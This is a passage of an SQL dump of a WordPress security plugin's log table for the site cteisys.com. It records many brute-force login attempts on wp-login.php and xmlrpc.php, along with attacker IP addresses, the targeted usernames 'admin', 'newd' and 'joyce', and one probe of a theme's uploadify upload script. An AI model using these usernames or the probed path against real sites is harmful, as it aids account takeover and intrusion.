|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.37.194',3515688386,'newd',0,1664983557.7204,7,'T9UQ8hnpyGvNlWebKoOCaIkq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('106.14.141.22',1779338518,'newd',0,1664984042.3989,152,'9czXGE4u5tyJUbwfnMOxSa3P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('90.156.169.12',1520216332,'newd',0,1664984042.4096,152,'Q9q3D7eTwGvLCtuWraybl8fM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.216.181',2717964469,'newd',0,1664984554.6563,152,'gyCTY5v9B4IfL7psbWoar3tq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.123.41',2731965225,'newd',0,1664984562.4077,152,'EwKxqXOUcjLlgva2HkypTeWr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.186.163',3583556259,'joyce',0,1664985103.3834,152,'p5GlFsZdU4g3wyBiTm9hO6S2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.211.99.217',3033752537,'newd',0,1664985103.3927,152,'WamyeTiMvflcCNwnPYAVUZko','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664985402.8952,7,'HjUhmSs8BroEdYnb0DyTagvR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1664985561.3501,152,'3wnEM6aISH9QsChz0OudyVDL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1664985600.9393,152,'bhfxzXtNomqLCYGrBvFIpMPZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.130.83.27',763515675,'newd',0,1664986102.8069,152,'FKfL7R2jJcv6G4nBZuIlbNah','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('158.255.80.210',2667532498,'newd',0,1664986131.7552,152,'wUvGdak6l2oxCF7eypE9D0iV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.36',1868207652,'newd',0,1664986633.4841,152,'eHh4bMtviEODKCzGA3ynwg6r','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.46.122.50',2754509362,'admin',0,1664986704.4027,51,'myfbOsNlCUa459eEIFMDR08W','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.228.214',2673468630,'admin',0,1664986748.5373,51,'3pwnlAOa5X6uWSdBGiR0gfeJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.238.150.43',1508808235,'joyce',0,1664986829.9996,152,'Ea1qG8jrbvTk0OmeWf9hZSHy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.195.254.123',3351510651,'newd',0,1664987619.8356,7,'K39FX08D5PvlhnCqaYtydM7j','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.81.59.92',223427420,'admin',0,1664989153.9421,51,'ZCNmYqApxfEt03e4M5kbjnJL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.147',3103917203,'admin',0,1664991521.5381,51,'l3WMsCodzI9xhbtn1vJVAOj6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.65.213.168',1296160168,'admin',0,1664991550.8714,51,'wkr7YJDuyU9qtABEZNMam8Hp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.254.90.243',1761499891,'Joyce',0,1664991963.4553,152,'p6RxLqVrcliE8S0uG1mFCDzN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.102.23.139',1382422411,'Joyce',0,1664992862.9508,152,'49ZEwiFJ52hCWUoOBKQeurMp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.206.225.51',3117343027,'joyce',0,1664992876.4063,152,'na9VuSZBhjKCmRqPef0HkWTI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.195.254.123',3351510651,'newd',0,1664993400.3483,7,'Ykqc2S8VmArQiPeMzvnWagTw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.219.13',1736629005,'admin',0,1664993931.6868,51,'LPYoQZtkEe6BS4HFdwhIRasW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('141.98.102.235',2372036331,'joyce',0,1664993966.3903,152,'dYEI8WL7cQgTeljv65bpxZmV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('2.58.47.203',37367755,'joyce',0,1664995754.7357,152,'oi4NJdA37XQ9E68qvUWBTOHf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.87.243',3642054643,'admin',0,1664996341.9114,51,'HgCzRU28o9yP4xpNm1rSuQqL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0);
INSERT INTO `cerber_log` VALUES ('133.130.103.36',2239915812,'admin',0,1664996368.2434,51,'vYe0brhGlcMpxtdwDqTy6oHm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.58.173.138',3510283658,'joyce',0,1664997630.5405,152,'2f09PZxuAbnoWmeGtYFLzq5c','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.37.194',3515688386,'newd',0,1664997835.0733,7,'TMrK2UGe4zOhCPyvgjJs3dmR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.146.18.88',1435636312,'admin',0,1664998758.6291,51,'bvLdOsAmtMNITUkocCqzHaSp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('206.189.129.168',3468525992,'admin',0,1664998783.9691,51,'ml8hXSQVs1MBrD0xcCgF2NG7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.109.148.216',2523763928,'newd',0,1665001072.5727,7,'V75KwjZJhQeuTlNHzE6rkoq4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('84.39.117.57',1411872057,'Joyce',0,1665001093.3698,152,'xVSFqt1EYiWcfbJyPLasCA2Z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.126.219.43',3112098603,'newd',0,1665001112.8813,7,'uW74xdlM2kqcDenpvL1oE90P','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.19.179.171',2249438123,'joyce',0,1665002528.6097,152,'Ue8D0aKPcOIrhj3ynTYLsJup','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.187.58.136',599472776,'newd',0,1665003436.1262,7,'0wN4ivq5rdsPXBDOQxR6hZap','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.81.59.92',223427420,'newd',0,1665003459.2091,7,'59eZj4yN1zLUpfTK67CvJRbt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.85',3583549781,'Joyce',0,1665003665.8937,152,'Wrb0kqXstN5KA4ZMmV87fPEa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.116.156',3451483292,'newd',0,1665003905.2371,7,'0DUBiLVAw28eCj57Fhzsckyo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.50.216',3328324312,'newd',0,1665004808.8194,7,'IRpSlbJDZPOjsBYnrFE2xL4v','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.75.65.218',575357402,'newd',0,1665005795.5637,7,'cGurnSejOsB82z3Woq0gFYyU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.129.222.91',1736564315,'newd',0,1665005830.1813,7,'ZSwsyxBDFMv3R1n5hlQJ9bW4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.240',3583549936,'joyce',0,1665006609.7924,152,'upF8JWycOrY3aKtzXPmEIBgT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.152',1046910104,'Joyce',0,1665007885.9984,152,'AEpzSqk3lh7niQ1IDbgerFjf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.167.244.67',1806169155,'joyce',0,1665007906.8062,152,'2mkqUoTIgcDO7dEyJ6BsnFZb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.85.155',3324925339,'newd',0,1665008179.0928,7,'1U3MKpSAiJsPf9VXOZ0Bu6WD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.37.254.14',908459534,'newd',0,1665008210.4440,7,'wkySDr93FXhCsbo2IMWxHNem','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.126.96.47',343826479,'newd',0,1665008770.3787,152,'15xeyp3L7oYUjVcuTQPAWE9r','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('152.89.160.131',2556010627,'joyce',0,1665009618.4818,152,'tXEf7PySvYxdMWJIB9g6LoQj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.184.76',2261891148,'newd',0,1665010596.2709,7,'sEUe1jPd0V5yQY4gRAam32Xv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.198.121',3497117305,'newd',0,1665010622.3983,7,'5YiIwtA713RMvj4kL6q20CcN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.59.165.88',3258688856,'admin',0,1665012884.4132,152,'eC9ndY7D4OgZ5LkQMhi1wVaB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.110.251',2650107643,'newd',0,1665013021.9043,7,'kS84w2OZEhgj0Yvps1APDH7d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.162.204.214',2997013718,'Joyce',0,1665014531.0621,152,'NCsUThj1bxdrkJAZKcQpYa6S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('40.70.241.53',675737909,'newd',0,1665014604.9019,152,'cjmZBORr2XSVk9ebwsGfIpT1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.36.190',3515688126,'newd',0,1665014863.0147,7,'E2y4cQvOPi7z6ZXbGnTgYwtJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.102.23.139',1382422411,'joyce',0,1665015074.2201,152,'5oLteMfUvV3GHPiwIEhlnxy2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.166.183.192',1738979264,'admin',0,1665015439.7483,51,'AUlSZPYMgws41NetcKEH3q2h','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.182.249.22',2478242070,'admin',0,1665015466.9271,51,'lDrxEt80aBOXhjKpTHeFdIR7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.57.9',3515693321,'newd',0,1665016020.9364,7,'nmRMj28Bov9GVuNbd3tsr6EL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.180.107.103',1806986087,'newd',0,1665016337.3651,152,'cM6AKCmZFo8ah3yqEJikpWRS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.206.105.227',3285084643,'joyce',0,1665016852.1876,152,'k2x9hJKusICQlRzSFetnYmo1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.234.105',1152903785,'newd',0,1665016975.2460,152,'1OHTFhD9ZoA2gWEBLeb7VQkY','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('173.212.197.26',2916402458,'newd',0,1665017245.6905,152,'7s3ip8JqGdUc1f0EX6tSKI4W','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.220.143',861658255,'admin',0,1665017840.5784,51,'QZG843en9cJtj2C1dsFlgO0p','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.200.228',2671888612,'admin',0,1665017867.4775,51,'aVb6kG9QTY1ewZWIyHnSRpcJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('130.61.143.194',2185072578,'newd',0,1665018161.1221,152,'uBJgn1UI0VheL48yikrMxTHf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.159.15.23',866062103,'newd',0,1665019065.0534,152,'IyLECfVmT3aPhdNjz4KAxDc6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.60.32',3328326688,'newd',0,1665019116.4651,7,'XKEc0JTjOCdSpPkoywb3N2FL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.40',3583549736,'joyce',0,1665019999.6501,152,'zuDAyb4tCHSmJEVlIQp8k9U0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.37.156.240',908434672,'admin',0,1665020244.0720,51,'OFN9L7D2Zew5QU3jTtsC8MY1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.244.177.220',2415178204,'admin',0,1665020286.8530,51,'Lgcx7zHhqeX9tN2swVBYp1SF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.46.253',3515690749,'newd',0,1665020914.5815,7,'kIe57SKGgRjUFZlV4icA06dY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.138.195.27',3649749787,'Joyce',0,1665020989.5607,152,'dhNDTOgerxK671UVYI4wBLtb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.203.108.168',2680908968,'newd',0,1665021707.7564,7,'eocbQhijn1Cqg3FOExRmkLsU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.108.168',2680908968,'admin',0,1665021708.7380,51,'C5F3dWBtXpwcEora6HONDkGm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.108.168',2680908968,'newd',0,1665021709.7276,7,'dq92tnQwb8GBVjLDsPUF6zMW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.108.168',2680908968,'admin',0,1665021710.6843,51,'LFEKbyaCvkm1ZlfO0NRYzUWP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.108.168',2680908968,'newd',0,1665021711.6444,7,'5YSn8Md3HGB4Rh0DraCvTE1z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.108.168',2680908968,'',0,1665021711.6494,10,'5YSn8Md3HGB4Rh0DraCvTE1z','','701|0|0|0|cteisys.com/wp-login.php',0,701,0),('159.203.108.168',2680908968,'',0,1665021712.5487,50,'sGDK8uWoAQ1v0X3gx4LEakNC','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021713.6133,50,'DBQGkV53i78bLqEIlvA2nFhg','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021714.6440,50,'My7XvPDNRFG6JmiUTQW8S1Kw','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021715.7144,50,'A81ucqC9tSG2PVJyRFgUjTDY','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021716.6991,50,'LIYQ5nVvBPFrDmjoM6yx9lUE','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021717.6686,50,'5yOU39d1ZGhkDLBenmHgXVjs','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021718.6640,50,'9JX6OLu2GtxFk0erhnCZaYUE','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021719.7479,50,'UOY8ixNzb60flsEAvh5LoqDe','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021720.9445,50,'2CTrD7auAP6ZoMF8Epw4kczd','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021722.1418,50,'UQzSm7XPiGqxa4lnD0OLTJFv','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021723.1507,50,'xguelUvBtQRbAkfCoYEK50pi','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021723.1513,18,'xguelUvBtQRbAkfCoYEK50pi','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021723.9148,50,'APlyjXY46USfNunDeH8Io0zO','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021723.9155,18,'APlyjXY46USfNunDeH8Io0zO','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021724.7229,50,'Kk6yVxbDMfW3qe4SoGnjwlFv','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021724.7234,18,'Kk6yVxbDMfW3qe4SoGnjwlFv','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021725.5549,50,'7M8BKR2gCTpwPzmEuLZ1JFO3','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021725.5555,18,'7M8BKR2gCTpwPzmEuLZ1JFO3','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021726.3893,50,'cTlRuQkyxN3V4Sgo2PjHC7X0','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021726.3897,18,'cTlRuQkyxN3V4Sgo2PjHC7X0','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021727.1775,50,'RUiunHNFDbrZxK0TOvCGIMEP','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021727.1781,18,'RUiunHNFDbrZxK0TOvCGIMEP','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021728.0162,50,'H0qGvRfaQiX6rVYEI7SNhnkw','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021728.0167,18,'H0qGvRfaQiX6rVYEI7SNhnkw','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021728.7992,50,'eJbd87DS61pUoqrX2YaBEk4t','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021728.7996,18,'eJbd87DS61pUoqrX2YaBEk4t','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021729.5958,50,'fTquzZ50gcD4m9p6jY1oACNL','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021729.5965,18,'fTquzZ50gcD4m9p6jY1oACNL','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021730.3730,50,'a7tTvGKhd6psgMxQLB4VINe0','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021730.3763,18,'a7tTvGKhd6psgMxQLB4VINe0','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021731.1622,50,'Gc4dQsZKwC6JT9jnpz3h2D7I','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021731.1627,18,'Gc4dQsZKwC6JT9jnpz3h2D7I','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021731.9757,50,'Cae6fHbvkrQt1ImdEsjNVwxB','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021731.9762,18,'Cae6fHbvkrQt1ImdEsjNVwxB','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021732.7848,50,'KCmuZe2zXsnjlcxW0b7QopDV','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021732.7852,18,'KCmuZe2zXsnjlcxW0b7QopDV','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021733.5044,50,'obyp3tmiS2wEeXFZHhgT04PV','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021733.5052,18,'obyp3tmiS2wEeXFZHhgT04PV','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021734.2306,50,'lT3wAKbxYZozW5e0XSqGacn2','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021734.2311,18,'lT3wAKbxYZozW5e0XSqGacn2','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021734.9584,50,'K9qVY4aef02bzMchkiQC8AB3','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021734.9590,18,'K9qVY4aef02bzMchkiQC8AB3','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021735.9361,50,'RioxS9IbpWXOVltd2sQKkhDB','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021735.9367,18,'RioxS9IbpWXOVltd2sQKkhDB','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021736.7106,50,'mUHjst86iEerXLgCI923J0R4','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021736.7111,18,'mUHjst86iEerXLgCI923J0R4','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021737.4939,50,'1q8ZUQTGsYmgSXH0LuFA2j6b','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021737.4943,18,'1q8ZUQTGsYmgSXH0LuFA2j6b','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021738.2719,50,'qIdOmCzPZ8b0ik2gTfuv713s','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021738.2723,18,'qIdOmCzPZ8b0ik2gTfuv713s','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021739.0113,50,'iJaq8KzECp20udoxlYNAZM1W','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021739.0121,18,'iJaq8KzECp20udoxlYNAZM1W','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021739.8190,50,'hcW1xKyBJCLgmvEApUOSdi8j','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021739.8193,18,'hcW1xKyBJCLgmvEApUOSdi8j','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021740.5894,50,'bTZGFcKQfyLzp3EmBAU2jsdC','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021740.5898,18,'bTZGFcKQfyLzp3EmBAU2jsdC','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021741.4104,50,'04UOkm5VtXEMdR2jqaPNpybv','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021741.4109,18,'04UOkm5VtXEMdR2jqaPNpybv','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021742.2226,50,'GvUYQHe0NyLPuC9ZO2f6XqDT','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021742.2646,18,'GvUYQHe0NyLPuC9ZO2f6XqDT','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021743.0428,50,'VqrY8yIET7b9wLs5F0hlzm1O','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021743.0434,18,'VqrY8yIET7b9wLs5F0hlzm1O','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.203.108.168',2680908968,'',0,1665021743.8193,50,'9nzlcBkFLiUfNtPCHySeJDxI','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.203.108.168',2680908968,'',0,1665021743.8197,18,'9nzlcBkFLiUfNtPCHySeJDxI','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('198.98.49.240',3328324080,'newd',0,1665021861.2108,7,'sYZzUEg13JQ8o4BIb9xnWKTm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.38.44.6',908471302,'newd',0,1665021891.9947,152,'y2KamYnLji4AGRglQqBI0fH3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.116.156',3451483292,'newd',0,1665022327.4752,7,'hLKBxQ3osOyimpDC8jGgw5ME','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.52.221',1364735197,'admin',0,1665022722.8131,51,'pGaLrvt2DJNQAmi1HzxO7UM4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.14.4',2160528900,'admin',0,1665022752.7291,51,'1Mznwcgek46GfsNYLV7rt92O','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.210.99.98',869426018,'newd',0,1665022838.9190,152,'n21DlHfNhSV8FE6yCYOsAPIj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.230.247.143',2531719055,'newd',0,1665023829.7492,152,'UeDtJi8oup6lBILhyO1F4WTm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('106.15.38.206',1779377870,'admin',0,1665025216.9240,51,'u69LJZhD8s2HTFpf4nG3aVWy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.0.91',2884894811,'admin',0,1665025246.9794,51,'Fcd8WQ2Uk3CnZXI9zNS1epwr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('144.208.67.117',2429567861,'newd',0,1665025735.5911,152,'S1Npw2MV35Ag6PoGcRLDiZQu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.219.45',2994789165,'newd',0,1665026544.7626,152,'rox02mtgBJH83WwZVzOvu6bG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.19.179.139',2249438091,'Joyce',0,1665027173.8921,152,'w8gY5Hz1WD2J6vTqBZOXUikc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.209.0',2487800064,'newd',0,1665027647.3371,152,'GeXElS8oa2W7ZP90UKm3BvYQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.38.20.161',3257275553,'',0,1665027745.9990,55,'mjAqyX1sMu4nU7kD39vrHbWP','','19|0|0|0|cteisys.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php',0,19,0),('167.172.168.111',2813110383,'admin',0,1665027746.7517,51,'Y08XLODBMzHtWdprE4fy7uGN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.195.185.149',1740880277,'newd',0,1665028133.6770,152,'NCJRAXnfGb2csDtFWM8Equyr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.40.255.186',2083061690,'newd',0,1665028488.8059,152,'LtDcdCEY170flr5NHg3FioT6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.17.110',2884899182,'newd',0,1665028865.5030,152,'BVNr6zeAU7PSqEs9ulbCtwZ4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.166.39.15',1386620687,'admin',0,1665030168.9127,51,'phH2UBXNY3l80MC4Go9bEeDT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1665030718.3752,152,'aZUTAWkvgJnON9PDMHxbSBt0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.9.19.107',3104379755,'joyce',0,1665030828.3151,152,'nbPWwt1Vs2reAHZNxCILchyg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.67.171',3270067115,'newd',0,1665031041.6869,152,'pgVlIywFt3PYreKf9BRisJ8M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.60.32',3328326688,'newd',0,1665031178.2453,7,'vZl4h6E9rLG7qoje8B2mdcVS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.232.183.66',2783491906,'admin',0,1665031785.0832,152,'dt6aUP3VNfbCEch9s0oILejy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.209.0',2487800064,'admin',0,1665032080.7528,152,'qlvEPgHdUfI5ZcwTKyXFo4BS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.188.207.230',3351039974,'admin',0,1665032428.6153,152,'qu7shW3K8aDS4HyjPJwrnYx1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.5.109',2994734445,'admin',0,1665032499.6595,51,'fdTwqu7PU8jtvIaiDYH2JCSZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.196.200',1168360648,'admin',0,1665032543.1912,51,'uoiXmqDrazjMSZb4y9G8p0eQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.160.166.188',3651184316,'admin',0,1665032745.7368,152,'6nch5xZq7NSX9aj3QtkCmsue','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.21.74',2884900170,'admin',0,1665033396.7480,152,'tWj2fYDP9CUKevkzwpnGbIyM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.242.56.232',3270654184,'admin',0,1665033739.5636,152,'rV1ZYxu8idn2q0UE5sFozRPI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.204.128.101',1741455461,'admin',0,1665034027.0401,152,'4WXcgurLvj3Gs8Qb6fHenDBx','','0|0|0|0|cteisys.com/xmlrpc.php',